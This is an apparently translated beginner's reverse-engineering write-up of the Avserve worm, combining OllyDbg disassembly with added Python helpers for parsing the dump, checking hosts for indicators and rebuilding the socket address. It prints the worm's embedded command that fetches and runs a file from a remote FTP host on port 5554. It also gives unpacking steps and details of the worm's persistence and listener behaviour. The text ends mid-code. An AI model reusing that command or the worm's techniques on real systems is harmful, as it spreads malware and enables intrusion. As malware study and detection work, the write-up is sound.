Preliminary Analysis of Avserve Virus (ZT)

xiaoxiao2021-03-06  39

Author: mejy FCG [BCG] [] [] [NUKE DFCG] [IPB]

Disclaimer: this article is for study only; anyone who misuses the techniques it involves bears the consequences themselves!

Since this is the first time I have analyzed a virus, there are many incorrect places; please point them out!!!

I have not checked this over formally before posting it! Some places are definitely not very accurate! Please bear with me, and corrections are welcome!

Disassembly shows that there are only a few simple functions.

004027CE> B8 DD274000      MOV EAX, 23918_UP.004027DD          ; OllyDbg stops here when the program is loaded

When loading, OllyDbg warns that the program is compressed! The detection tools don't recognise the packer, so I try to unpack it by hand. By feel, the packer is part of the virus itself.

Copy and spread the code! After unpacking, I feel that its impact is much smaller! I don't know if that is right; let's take it one step at a time!

Code: --------------------------------------------------------------------------------

004027CE> B8 DD274000      MOV EAX, 23918_UP.004027DD
004027D3  8000 28          ADD BYTE PTR DS:[EAX], 28
004027D6  40               INC EAX
004027D7  8100 67452301    ADD DWORD PTR DS:[EAX], 1234567     ; single-step to here: the code below changes
004027DD  90               NOP
004027DE  A9 521DFF50      TEST EAX, 50FF1D52
004027E3  64:FF35 00000000 PUSH DWORD PTR FS:[0]
004027EA  64:8925 00000000 MOV DWORD PTR FS:[0], ESP
004027F1  33C0             XOR EAX, EAX
004027F3  8908             MOV DWORD PTR DS:[EAX], ECX

becomes:

004027CE> B8 DD274000      MOV EAX, 23918_UP.004027DD
004027D3  8000 28          ADD BYTE PTR DS:[EAX], 28
004027D6  40               INC EAX
004027D7  8100 67452301    ADD DWORD PTR DS:[EAX], 1234567
004027DD  B8 10984000      MOV EAX, 23918_UP.00409810          ; breakpoint on the address in EAX, then Shift+F9
004027E2  50               PUSH EAX
004027E3  64:FF35 00000000 PUSH DWORD PTR FS:[0]               ; typical exception (SEH) trick
004027EA  64:8925 00000000 MOV DWORD PTR FS:[0], ESP           ; installs 00409810 as the SEH handler
004027F1  33C0             XOR EAX, EAX
004027F3  8908             MOV DWORD PTR DS:[EAX], ECX         ; writing to address 0 raises the exception

00409810  B8 B18740F0      MOV EAX, F04087B1                   ; stopped here
00409815  8D88 82100010    LEA ECX, DWORD PTR DS:[EAX+10001082]
0040981B  8941 01          MOV DWORD PTR DS:[ECX+1], EAX
0040981E  8B5424 04        MOV EDX, DWORD PTR SS:[ESP+4]       ; EXCEPTION_RECORD
00409822  8B52 0C          MOV EDX, DWORD PTR DS:[EDX+C]       ; ExceptionAddress
00409825  C602 E9          MOV BYTE PTR DS:[EDX], 0E9          ; overwrites the faulting instruction with a JMP rel32 ...
00409828  83C2 05          ADD EDX, 5
0040982B  2BCA             SUB ECX, EDX
0040982D  894A FC          MOV DWORD PTR DS:[EDX-4], ECX       ; ... whose target is the address computed in ECX
00409830  33C0             XOR EAX, EAX
00409832  C3               RETN                                ; returns to system space here; I used Ctrl+F9 until I got back
00409833  B8 B18740F0      MOV EAX, F04087B1                   ; you can also remove the breakpoint above, set one here and single-step; the program reaches the OEP directly
00409838  64:8F05 00000000 POP DWORD PTR FS:[0]
0040983F  83C4 04          ADD ESP, 4
00409842  55               PUSH EBP
00409843  53               PUSH EBX

060010B5  8945 A0          MOV DWORD PTR SS:[EBP-60], EAX      ; checks the PE file's header characteristics
060010B8  837D A0 00       CMP DWORD PTR SS:[EBP-60], 0
060010BC  75 07            JNZ SHORT APIHOOK.060010C5
060010BE  33C0             XOR EAX, EAX
060010C0  E9 92000000      JMP APIHOOK.06001157

. . . the first time through, it arrives here

00340430  85C0             TEST EAX, EAX                       ; kernel32.ExitProcess
(omitted)
00340451  C9               LEAVE

×××××××××××××××××××××××××× there is a loop here; it should be handling the IAT

00340403  51               PUSH ECX                            ; IAT / import table entry: user32.dll
00340404  FF93 8F120010    CALL DWORD PTR DS:[EBX+1000128F]    ; LoadLibrary
0034040A  85C0             TEST EAX, EAX
0034040C  74 3A            JE SHORT 00340448
0034040E  8945 FC          MOV DWORD PTR SS:[EBP-4], EAX       ; module handle
00340411  8B56 04          MOV EDX, DWORD PTR DS:[ESI+4]
00340414  03D3             ADD EDX, EBX
00340416  8B7E 08          MOV EDI, DWORD PTR DS:[ESI+8]
00340419  03FB             ADD EDI, EBX
0034041B  8B02             MOV EAX, DWORD PTR DS:[EDX]
0034041D  85C0             TEST EAX, EAX
0034041F  74 1A            JE SHORT 0034043B
00340421  52               PUSH EDX
00340422  8B02             MOV EAX, DWORD PTR DS:[EDX]
00340424  03C3             ADD EAX, EBX
00340426  50               PUSH EAX                            ; imported name
00340427  FF75 FC          PUSH DWORD PTR SS:[EBP-4]           ; module handle
0034042A  FF93 93120010    CALL DWORD PTR DS:[EBX+10001293]    ; resolves the name (GetProcAddress, judging by the arguments)
00340430  85C0             TEST EAX, EAX
00340432  74 14            JE SHORT 00340448
00340434  AB               STOS DWORD PTR ES:[EDI]             ; stores the resolved address into the IAT slot
00340435  5A               POP EDX
00340436  83C2 04          ADD EDX, 4
00340439 ^EB E0            JMP SHORT 0034041B

Then I arrive here.

003401C0  8B4E 2C          MOV ECX, DWORD PTR DS:[ESI+2C]
003401C3  8B56 24          MOV EDX, DWORD PTR DS:[ESI+24]
003401C6  0356 08          ADD EDX, DWORD PTR DS:[ESI+8]
003401C9  6A 40            PUSH 40
003401CB  68 00100000      PUSH 1000
003401D0  51               PUSH ECX
003401D1  6A 00            PUSH 0
003401D3  FF12             CALL DWORD PTR DS:[EDX]             ; looks like VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
003401D5  8985 8B120010    MOV DWORD PTR SS:[EBP+1000128B], EAX
003401DB  56               PUSH ESI                            ; these several calls restore the import table, I think
003401DC  E8 D7030000      CALL 003405B8                       ; following it in, it copies the import table and does some other unpacking work
003401E1  56               PUSH ESI
003401E2  E8 DF040000      CALL 003406C6
003401E7  56               PUSH ESI
003401E8  E8 CB020000      CALL 003404B8
003401ED  56               PUSH ESI
003401EE  E8 62020000      CALL 00340455
003401F3  8B4E 34          MOV ECX, DWORD PTR DS:[ESI+34]
003401F6  85C9             TEST ECX, ECX                       ; from here I single-stepped with F8 down to the following

004098AE  8985 21110010    MOV DWORD PTR SS:[EBP+10001121], EAX ; 23918_UP.
004098B4  8BF0             MOV ESI, EAX
004098B6  59               POP ECX
(omitted)
004098C9  59               POP ECX
004098CA  5B               POP EBX
004098CB  5D               POP EBP
004098CC  FFE0             JMP EAX                             ; jumps to the new OEP, which is the same as the original load address

004027CE> 55               PUSH EBP                            ; this time the entry point has become this

My unpacking is at a beginner level, so I won't presume to go into the theory!

004027CF  8BEC             MOV EBP, ESP
004027D1  6A FF            PUSH -1
004027D3  68 28514000      PUSH 23918_UP.00405128

You can dump the program at this entry point and then fix it with ImportREC; the program runs successfully. But I recommend patching it before running it.

Unpacked. Now let's analyze the virus's workflow. After fixing, load the unpacked program in OllyDbg; a look at its import table basically tells you how it works. Once OllyDbg has loaded it, Ctrl+N lists the names in the current module!

To see its process, we single-step with F8, step by step. I forgot to say: this virus was written in VC.

00402896  |. 50              PUSH EAX                           ; this is the VC program's startup signature; F4 to here
00402897  |. E8 4EF7FFFF     CALL dumped_.00401FEA              ; F7 to step in, otherwise the virus runs directly

00401FEA  /$ 55              PUSH EBP                           ; inside the CALL above
00401FEB  |. 8BEC            MOV EBP, ESP
00401FED  |. 51              PUSH ECX
00401FEE  |. 51              PUSH ECX
00401FEF  |. 56              PUSH ESI
00401FF0  |. FF15 44504000   CALL DWORD PTR DS:[<&kernel32.GetTickCount>] ; [GetTickCount

The above gets the time elapsed since the system started.

00401FF6  |. 50              PUSH EAX
00401FF7  |. E8 22F0FFFF     CALL dumped_.0040101E

The CALL above saves that time to memory at [406F20].

00401FFC  |. 6A 01           PUSH 1
00401FFE  |. E8 6E000000     CALL dumped_.00402071

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

Follow into the CALL above and see what it does.

00402071  /$ 55              PUSH EBP
00402072  |. 8BEC            MOV EBP, ESP
00402074  |. 81EC 24080000   SUB ESP, 824
0040207A  |. 56              PUSH ESI
0040207B  |. BE 00040000     MOV ESI, 400
00402080  |. 8D85 DCF7FFFF   LEA EAX, DWORD PTR SS:[EBP-824]
00402086  |. 56              PUSH ESI                           ; /BufSize => 400 (1024.)
00402087  |. 50              PUSH EAX                           ; |PathBuffer
00402088  |. 6A 00           PUSH 0                             ; |hModule = NULL
0040208A  |. FF15 34504000   CALL DWORD PTR DS:[<&kernel32.GetModuleFileNameA>] ; \GetModuleFileNameA  gets the program's own path
00402090  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
00402096  |. 56              PUSH ESI                           ; /BufSize => 400 (1024.)
00402097  |. 50              PUSH EAX                           ; |Buffer
00402098  |. FF15 4C504000   CALL DWORD PTR DS:[<&kernel32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA  gets the Windows installation directory
0040209E  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
004020A4  |. 50              PUSH EAX
004020A5  |. E8 96000000     CALL dumped_.00402140              ; didn't work out what this function does; it doesn't seem to matter much
004020AA  |. 80BC05 DBFBFFFF 5C  CMP BYTE PTR SS:[EBP+EAX-425], 5C ; 5C = '\': is the last character of the directory a backslash?
004020B2  |. 59              POP ECX
004020B3  |. 5E              POP ESI
004020B4  |. 74 13           JE SHORT dumped_.004020C9
004020B6  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
004020BC  |. 68 B06A4000     PUSH dumped_.00406AB0
004020C1  |. 50              PUSH EAX
004020C2  |. E8 F9050000     CALL dumped_.004026C0

Here, let's take a look at memory.

004068C8  20 69 40 00 18 69 40 00 10 69 40 00 08 69 40 00   i@..i@..i@..i@.
004068D8  00 69 40 00 F8 68 40 00 F0 68 40 00 E8 68 40 00  .i@..h@..h@..h@.
004068E8  31 35 30 20 4F 4B 0A 00 32 30 30 20 4F 4B 0A 00  150 OK..200 OK..
004068F8  32 32 36 20 4F 4B 0A 00 32 33 30 20 4F 4B 0A 00  226 OK..230 OK..
00406908  33 33 31 20 4F 4B 0A 00 32 32 30 20 4F 4B 0A 00  331 OK..220 OK..
00406918  61 76 73 65 72 76 65 00 61 76 73 65 72 76 65 2E  avserve.avserve.   ; program name
00406928  65 78 65 00 65 63 68 6F 20 6F 66 66 26 65 63 68  exe.echo off&ech
00406938  6F 20 6F 70 65 6E 20 25 73 20 35 35 35 34 3E 3E  o open %s 5554>>
00406948  63 6D 64 2E 66 74 70 26 65 63 68 6F 20 61 6E 6F  cmd.ftp&echo ano
00406958  6E 79 6D 6F 75 73 3E 3E 63 6D 64 2E 66 74 70 26  nymous>>cmd.ftp&
00406968  65 63 68 6F 20 75 73 65 72 26 65 63 68 6F 20 62  echo user&echo b
00406978  69 6E 3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F  in>>cmd.ftp&echo
00406988  20 67 65 74 20 25 69 5F 75 70 2E 65 78 65 3E 3E   get %i_up.exe>>
00406998  63 6D 64 2E 66 74 70 26 65 63 68 6F 20 62 79 65  cmd.ftp&echo bye
004069A8  3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 6F  >>cmd.ftp&echo o
004069B8  6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70  n&ftp -s:cmd.ftp
004069C8  26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20  &%i_up.exe&echo
004069D8  6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26  off&del cmd.ftp&
004069E8  65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E  echo on.....127.
004069F8  30 2E 30 2E 31 00 00 ...                         0.0.1...%s %c....
00406A08  5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06 ...    \\%s\ipc$...

These should be the things that do the damage (my guess).
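The dump above is worth turning into something searchable. The following Python is an added example, not code from this write-up: it parses OllyDbg-style dump lines (the page's own hex bytes, with the byte extraction dropped from the "200 OK" line restored from the ASCII column, the 004069E8 line completed from the "127." its ASCII column shows, and the two tail lines left as short as they are printed), rebuilds the byte image, pulls out the printable strings the way `strings` would, splits the embedded cmd.exe one-liner into the commands cmd would run, and resolves the pointer table at 004068C8 that the RegSetValueExA call below reads through [4068C8]. The reply codes 150/200/226/230/331/220 are standard FTP responses, which fits the "open %s 5554" script and the port bound in the listener thread further down.

```python
import re
import struct
from typing import List, Tuple

# Constructed sample: the dump lines from the write-up, hex columns only.
DUMP = """\
004068C8 20 69 40 00 18 69 40 00 10 69 40 00 08 69 40 00
004068D8 00 69 40 00 F8 68 40 00 F0 68 40 00 E8 68 40 00
004068E8 31 35 30 20 4F 4B 0A 00 32 30 30 20 4F 4B 0A 00
004068F8 32 32 36 20 4F 4B 0A 00 32 33 30 20 4F 4B 0A 00
00406908 33 33 31 20 4F 4B 0A 00 32 32 30 20 4F 4B 0A 00
00406918 61 76 73 65 72 76 65 00 61 76 73 65 72 76 65 2E
00406928 65 78 65 00 65 63 68 6F 20 6F 66 66 26 65 63 68
00406938 6F 20 6F 70 65 6E 20 25 73 20 35 35 35 34 3E 3E
00406948 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 61 6E 6F
00406958 6E 79 6D 6F 75 73 3E 3E 63 6D 64 2E 66 74 70 26
00406968 65 63 68 6F 20 75 73 65 72 26 65 63 68 6F 20 62
00406978 69 6E 3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F
00406988 20 67 65 74 20 25 69 5F 75 70 2E 65 78 65 3E 3E
00406998 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 62 79 65
004069A8 3E 3E 63 6D 64 2E 66 74 70 26 65 63 68 6F 20 6F
004069B8 6E 26 66 74 70 20 2D 73 3A 63 6D 64 2E 66 74 70
004069C8 26 25 69 5F 75 70 2E 65 78 65 26 65 63 68 6F 20
004069D8 6F 66 66 26 64 65 6C 20 63 6D 64 2E 66 74 70 26
004069E8 65 63 68 6F 20 6F 6E 0A 00 00 00 00 31 32 37 2E
004069F8 30 2E 30 2E 31 00 00
00406A08 5C 5C 25 73 5C 69 70 63 24 00 00 00 EB 06
"""

# Tab, LF and CR count as printable so that "150 OK\n" survives whole.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def parse_dump(text: str) -> Tuple[int, bytearray]:
    """Rebuild a flat byte image from "ADDR b1 b2 ..." lines. Lines may be
    short; gaps between lines are zero-filled so addresses stay meaningful.
    A trailing ASCII column, if present, is ignored by the regex."""
    chunks = []
    for line in text.splitlines():
        m = re.match(r"\s*([0-9A-Fa-f]{8})((?:\s+[0-9A-Fa-f]{2}\b)+)", line)
        if m:
            chunks.append((int(m.group(1), 16), bytes.fromhex(m.group(2))))
    if not chunks:
        raise ValueError("no dump lines found")
    base = min(addr for addr, _ in chunks)
    image = bytearray(max(addr + len(raw) for addr, raw in chunks) - base)
    for addr, raw in chunks:
        image[addr - base:addr - base + len(raw)] = raw
    return base, image


def extract_strings(base: int, image: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Every run of at least min_len printable bytes, with its address."""
    found, start = [], None
    for i, b in enumerate(image):
        if b in PRINTABLE:
            start = i if start is None else start
        else:
            if start is not None and i - start >= min_len:
                found.append((base + start, image[start:i].decode("ascii")))
            start = None
    if start is not None and len(image) - start >= min_len:
        found.append((base + start, image[start:].decode("ascii")))
    return found


def resolve_pointer_table(base: int, image: bytes, table_addr: int, count: int) -> List[str]:
    """Follow count little-endian DWORD pointers stored at table_addr and
    return the NUL-terminated strings they point at."""
    out = []
    for i in range(count):
        ptr = struct.unpack_from("<I", image, table_addr - base + 4 * i)[0]
        off = ptr - base
        out.append(image[off:image.index(0, off)].decode("ascii"))
    return out


def split_commands(script: str) -> List[str]:
    """Split the embedded one-liner on '&' the way cmd.exe would run it."""
    return [c.strip() for c in script.rstrip("\n").split("&")]


if __name__ == "__main__":
    base, image = parse_dump(DUMP)
    for addr, s in extract_strings(base, image):
        print(f"{addr:08X} {s!r}")
    print(resolve_pointer_table(base, image, 0x4068C8, 8))
```

The pointer table resolves to avserve.exe, avserve and the six FTP reply strings, which is why the listing later shows `DWORD PTR DS:[4068C8]` as "avserve.exe". The script string is the download stage: it writes a cmd.ftp script, runs `ftp -s:cmd.ftp` against port 5554 of the address substituted for %s, executes the fetched %i_up.exe and deletes the script; the sample's own module name, 23918_UP, matches that naming pattern.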

004026C0  /$ 8B4C24 04       MOV ECX, DWORD PTR SS:[ESP+4]

Part of it omitted; you can follow it yourself.

0040271C  |. EB 03           JMP SHORT dumped_.00402721
0040271E  |> 8D79 FC         LEA EDI, DWORD PTR DS:[ECX-4]
00402721  |> 8B4C24 0C       MOV ECX, DWORD PTR SS:[ESP+C]      ; avserve.exe: the virus's other copy uses this name
00402725  |. F7C1 03000000   TEST ECX, 3

Part of it omitted.

0040279F  \. C3              RETN

004020C7  |. 59              POP ECX
004020C8  |. 59              POP ECX
004020C9  |> FF35 C8684000   PUSH DWORD PTR DS:[4068C8]         ; dumped_.00406920 ("avserve.exe")
004020CF  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
004020D5  |. 50              PUSH EAX
004020D6  |. E8 E5050000     CALL dumped_.004026C0
004020DB  |. 807D 08 00      CMP BYTE PTR SS:[EBP+8], 0
004020DF  |. 59              POP ECX
004020E0  |. 59              POP ECX
004020E1  |. 74 16           JE SHORT dumped_.004020F9          ; decides whether to copy: if your Windows directory does not have avserve.exe, it copies itself there
004020E3  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
004020E9  |. 6A 00           PUSH 0                             ; /FailIfExists = FALSE
004020EB  |. 50              PUSH EAX                           ; |NewFileName
004020EC  |. 8D85 DCF7FFFF   LEA EAX, DWORD PTR SS:[EBP-824]    ; |
004020F2  |. 50              PUSH EAX                           ; |ExistingFileName
004020F3  |. FF15 48504000   CALL DWORD PTR DS:[<&kernel32.CopyFileA>] ; \CopyFileA  copies itself
004020F9  |> 8D45 FC         LEA EAX, DWORD PTR SS:[EBP-4]
004020FC  |. 50              PUSH EAX                           ; /pHandle
004020FD  |. 68 806A4000     PUSH dumped_.00406A80              ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
00402102  |. 68 02000080     PUSH 80000002                      ; |hKey = HKEY_LOCAL_MACHINE
00402107  |. FF15 04504000   CALL DWORD PTR DS:[<&advapi32.RegOpenKeyA>] ; \RegOpenKeyA  very obviously modifies your registry so the program starts automatically
0040210D  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]
00402113  |. 50              PUSH EAX
00402114  |. E8 27000000     CALL dumped_.00402140
00402119  |. 59              POP ECX
0040211A  |. 50              PUSH EAX                           ; /BufSize
0040211B  |. 8D85 DCFBFFFF   LEA EAX, DWORD PTR SS:[EBP-424]    ; |
00402121  |. 50              PUSH EAX                           ; |Buffer
00402122  |. 6A 01           PUSH 1                             ; |ValueType = REG_SZ
00402124  |. 6A 00           PUSH 0                             ; |Reserved = 0
00402126  |. FF35 C8684000   PUSH DWORD PTR DS:[4068C8]         ; |ValueName = "avserve.exe"
0040212C  |. FF75 FC         PUSH DWORD PTR SS:[EBP-4]          ; |hKey
0040212F  |. FF15 08504000   CALL DWORD PTR DS:[<&advapi32.RegSetValueExA>] ; \RegSetValueExA
00402135  |. FF75 FC         PUSH DWORD PTR SS:[EBP-4]          ; /hKey
00402138  |. FF15 0C504000   CALL DWORD PTR DS:[<&advapi32.RegCloseKey>] ; \RegCloseKey
0040213E  |. C9              LEAVE
0040213F  \. C3              RETN                               ; that's the end of it. Back to the bad stuff below

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

00402003  |. 59              POP ECX
00402004  |. 59              POP ECX
00402005  |. E8 1EF0FFFF     CALL dumped_.00401028
0040200A  |. 33F6            XOR ESI, ESI
0040200C  |. 68 746A4000     PUSH dumped_.00406A74              ; /MutexName = "jobaka3l"
00402011  |. 56              PUSH ESI                           ; |InitialOwner => FALSE
00402012  |. 56              PUSH ESI                           ; |pSecurity => NULL
00402013  |. FF15 40504000   CALL DWORD PTR DS:[<&kernel32.CreateMutexA>] ; \CreateMutexA

Creates a mutex; what for?

00402019  |. FF15 3C504000   CALL DWORD PTR DS:[<&kernel32.GetLastError>] ; [GetLastError
0040201F  |. 3D B7000000     CMP EAX, 0B7                       ; 0B7 = ERROR_ALREADY_EXISTS: the mutex already exists, so another instance is already running
00402024  |. 75 07           JNZ SHORT dumped_.0040202D         ; if this jumps, the virus starts for real
00402026  |. 33C0            XOR EAX, EAX
00402028  |. 5E              POP ESI
00402029  |. C9              LEAVE
0040202A  |. C2 1000         RETN 10
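The two functions above leave three host-side traces that an incident responder can check for: the Run value named avserve.exe whose data is the copy in the Windows directory, the mutex (spelled "jobaka3l" in the listing), and the TCP port 5554 named in the FTP script. The Python below is an added example, not code from the write-up: it runs those checks over a constructed host snapshot. The snapshot layout (keys `windows_dir`, `run_values`, `mutexes`, `listening_tcp`) is this example's own assumption; on a live Windows host you would fill it from the registry, the object namespace and the listening-socket table rather than from literals.

```python
from typing import Dict, List

# Indicators taken from the listing: value name under HKLM\...\Run, mutex name
# and the port in the "open %s 5554" script.
IOC_RUN_VALUE_NAME = "avserve.exe"
IOC_MUTEX = "jobaka3l"
IOC_TCP_PORT = 5554


def audit_host(snapshot: Dict) -> List[str]:
    """Return sorted findings for one host snapshot (constructed format)."""
    findings: List[str] = []
    windir = snapshot.get("windows_dir", r"C:\WINDOWS").rstrip("\\").lower()
    expected_image = windir + "\\" + IOC_RUN_VALUE_NAME

    # Autostart: the worm registers its copy under Run, value name == file name.
    for name, data in snapshot.get("run_values", {}).items():
        reasons = []
        if name.lower() == IOC_RUN_VALUE_NAME:
            reasons.append("value name matches")
        if data.strip('"').lower() == expected_image:
            reasons.append("image is %WINDIR%\\avserve.exe")
        if reasons:
            findings.append(f"run:{name}:" + ",".join(reasons))

    # Single-instance mutex (compare case-insensitively; the listing is lowercased).
    for mutex in snapshot.get("mutexes", []):
        if mutex.lower() == IOC_MUTEX:
            findings.append(f"mutex:{mutex}")

    # Listener the thread function binds (htons(15B2) = 5554).
    for port in snapshot.get("listening_tcp", []):
        if port == IOC_TCP_PORT:
            findings.append(f"tcp:{port}")

    return sorted(findings)


# Constructed snapshots: one host showing all three traces, one showing none.
INFECTED_HOST = {
    "windows_dir": r"C:\WINDOWS",
    "run_values": {
        "avserve.exe": r"C:\WINDOWS\avserve.exe",
        "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    },
    "mutexes": ["Jobaka3l", "ShimCacheMutex"],
    "listening_tcp": [135, 445, 5554],
}
CLEAN_HOST = {
    "windows_dir": r"C:\WINDOWS",
    "run_values": {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
    "mutexes": ["ShimCacheMutex"],
    "listening_tcp": [135, 445],
}

if __name__ == "__main__":
    print(audit_host(INFECTED_HOST))
    print(audit_host(CLEAN_HOST))
```

Any single hit is worth a look, but the Run value plus the listener together are the strong signal, since the mutex vanishes as soon as the process is killed.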

0040202D  |> 53              PUSH EBX
0040202E  |. 8D45 FC         LEA EAX, DWORD PTR SS:[EBP-4]
00402031  |. 57              PUSH EDI
00402032  |. 8B3D 38504000   MOV EDI, DWORD PTR DS:[<&kernel32.CreateThread>] ; kernel32.CreateThread

Creates a thread:

00402038  |. 50              PUSH EAX                           ; /pThreadId
00402039  |. 56              PUSH ESI                           ; |CreationFlags
0040203A  |. 56              PUSH ESI                           ; |pThreadParm
0040203B  |. 68 6A1E4000     PUSH dumped_.00401E6A              ; |ThreadFunction = dumped_.00401E6A  the thread function (listed below)
00402040  |. 56              PUSH ESI                           ; |StackSize
00402041  |. 56              PUSH ESI                           ; |pSecurity
00402042  |. FFD7            CALL EDI                           ; \CreateThread
00402044  |. BB 80000000     MOV EBX, 80                        ; loop creating 0x80 = 128 threads
00402049  |> 8D45 F8         /LEA EAX, DWORD PTR SS:[EBP-8]
0040204C  |. 50              |PUSH EAX
0040204D  |. 56              |PUSH ESI
0040204E  |. 56              |PUSH ESI
0040204F  |. 68 F51E4000     |PUSH dumped_.00401EF5             ; the second thread function (listed at the end)
00402054  |. 56              |PUSH ESI
00402055  |. 56              |PUSH ESI
00402056  |. FFD7            |CALL EDI
00402058  |. 4B              |DEC EBX                           ; thread-creation loop
00402059  |.^75 EE           \JNZ SHORT dumped_.00402049        ; you must change this here! Don't let it get to 128; one thread is enough for you to analyze
0040205B  |. 5F              POP EDI
0040205C  |. 5B              POP EBX
0040205D  |> 56              PUSH ESI                           ; /MachineName
0040205E  |. FF15 00504000   CALL DWORD PTR DS:[<&advapi32.AbortSystemShutdownA>] ; \AbortSystemShutdownA  shutdown is cancelled with this function
00402064  |. 68 B80B0000     PUSH 0BB8                          ; /Timeout = 3000. ms
00402069  |. FF15 1C504000   CALL DWORD PTR DS:[<&kernel32.Sleep>] ; \Sleep  sleeps a while

It seems this never stops: it sleeps and goes round again. Now on to the thread function.

0040206F  \.^EB EC           JMP SHORT dumped_.0040205D

The thread function (00401E6A):

00401E6A  /. 55              PUSH EBP
00401E6B  |. 8BEC            MOV EBP, ESP
00401E6D  |. 83EC 14         SUB ESP, 14
00401E70  |. 56              PUSH ESI
00401E71  |. 33F6            XOR ESI, ESI
00401E73  |. 57              PUSH EDI
00401E74  |. 56              PUSH ESI                           ; /Protocol => IPPROTO_IP
00401E75  |. 6A 01           PUSH 1                             ; |Type = SOCK_STREAM
00401E77  |. 6A 02           PUSH 2                             ; |Family = AF_INET
00401E79  |. FF15 F0504000   CALL DWORD PTR DS:[<&WS2_32.socket>] ; \socket  creates a socket
00401E7F  |. 8BF8            MOV EDI, EAX
00401E81  |. 83FF FF         CMP EDI, -1
00401E84  |. 75 08           JNZ SHORT dumped_.00401E8E
00401E86  |> 5F              POP EDI
00401E87  |. 33C0            XOR EAX, EAX
00401E89  |. 5E              POP ESI
00401E8A  |. C9              LEAVE
00401E8B  |. C2 0400         RETN 4
00401E8E  |> 68 B2150000     PUSH 15B2                          ; /NetShort = 15B2 (5554.)
00401E93  |. 66:C745 EC 0200 MOV WORD PTR SS:[EBP-14], 2        ; |  sin_family = AF_INET
00401E99  |. FF15 EC504000   CALL DWORD PTR DS:[<&WS2_32.htons>] ; \htons  this function seems to be some port conversion;

network programming isn't something I can speak to.

00401E9F  |. 66:8945 EE      MOV WORD PTR SS:[EBP-12], AX       ; sin_port (network byte order)
00401EA3  |. 8D45 EC         LEA EAX, DWORD PTR SS:[EBP-14]
00401EA6  |. 6A 10           PUSH 10                            ; /AddrLen = 10 (16.)
00401EA8  |. 50              PUSH EAX                           ; |pSockAddr
00401EA9  |. 57              PUSH EDI                           ; |Socket
00401EAA  |. 8975 F0         MOV DWORD PTR SS:[EBP-10], ESI     ; |  sin_addr = 0 (INADDR_ANY)
00401EAD  |. FF15 18514000   CALL DWORD PTR DS:[<&WS2_32.bind>] ; \bind  binds the socket
00401EB3  |. 83F8 FF         CMP EAX, -1
00401EB6  |. 74 0E           JE SHORT dumped_.00401EC6
00401EB8  |. 6A 05           PUSH 5                             ; /Backlog = 5
00401EBA  |. 57              PUSH EDI                           ; |Socket
00401EBB  |. FF15 FC504000   CALL DWORD PTR DS:[<&WS2_32.listen>] ; \listen  listens; the queue length is 5

Someone who knows networking would know what this is.

00401EC1  |. 83F8 FF         CMP EAX, -1                        ; jumps down from here
00401EC4  |. 75 09           JNZ SHORT dumped_.00401ECF
00401EC6  |> 57              PUSH EDI                           ; /Socket
00401EC7  |. FF15 00514000   CALL DWORD PTR DS:[<&WS2_32.closesocket>] ; \closesocket  closes the socket

After doing its bad deeds, it hasn't forgotten to do this!

00401ECD  |.^EB B7           JMP SHORT dumped_.00401E86

It jumps from above to here:

00401ECF  |> 56              /PUSH ESI                          ; /pAddrLen
00401ED0  |. 56              |PUSH ESI                          ; |pSockAddr
00401ED1  |. 57              |PUSH EDI                          ; |Socket
00401ED2  |. FF15 E4504000   |CALL DWORD PTR DS:[<&WS2_32.accept>] ; \accept  accepts a connection; it waits here

The program sits here without moving and can't be debugged further, because it found no target.

But looking further down, it should pick an IP address and try to attack it. I haven't analyzed how; I don't think that's far off.
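Two points in the thread function above are worth making concrete: what htons does to the 15B2 pushed before bind, and why the debugger sits in accept. The Python below is an added example, not code from the write-up. It assembles the same 16-byte sockaddr_in the instructions build at [EBP-14] (WORD family 2, WORD port from htons at [EBP-12], DWORD address 0 from ESI at [EBP-10], and sin_zero, which the listing never writes and which is zeroed here), decodes it back, shows the byte-swapped value a debugger displays for sin_port, and then runs the same socket/bind/listen/accept sequence on 127.0.0.1 with an ephemeral port instead of 0.0.0.0:5554, with a loopback client so that accept returns. The helper names are this example's own.

```python
import socket
import struct

AF_INET = 2          # the WORD stored at [EBP-14]
WORM_PORT = 0x15B2   # the NetShort handed to htons: 5554 decimal


def build_sockaddr_in(port: int, address: str = "0.0.0.0") -> bytes:
    """Assemble sockaddr_in exactly as the listing does: family in host
    order, port in network (big-endian) order, address as four raw bytes."""
    return (struct.pack("<H", AF_INET)        # MOV WORD PTR [EBP-14], 2
            + struct.pack("!H", port)         # htons result -> [EBP-12]
            + socket.inet_aton(address)       # ESI = 0 -> [EBP-10] (INADDR_ANY)
            + bytes(8))                       # sin_zero


def parse_sockaddr_in(raw: bytes) -> dict:
    """Decode the 16 bytes a debugger shows at pSockAddr."""
    if len(raw) != 16:
        raise ValueError("sockaddr_in is 16 bytes")
    family = struct.unpack_from("<H", raw, 0)[0]
    port = struct.unpack_from("!H", raw, 2)[0]       # undo htons
    return {"family": family, "port": port, "address": socket.inet_ntoa(raw[4:8])}


def port_as_stored(port: int) -> int:
    """The value seen when sin_port is read as a little-endian WORD on x86:
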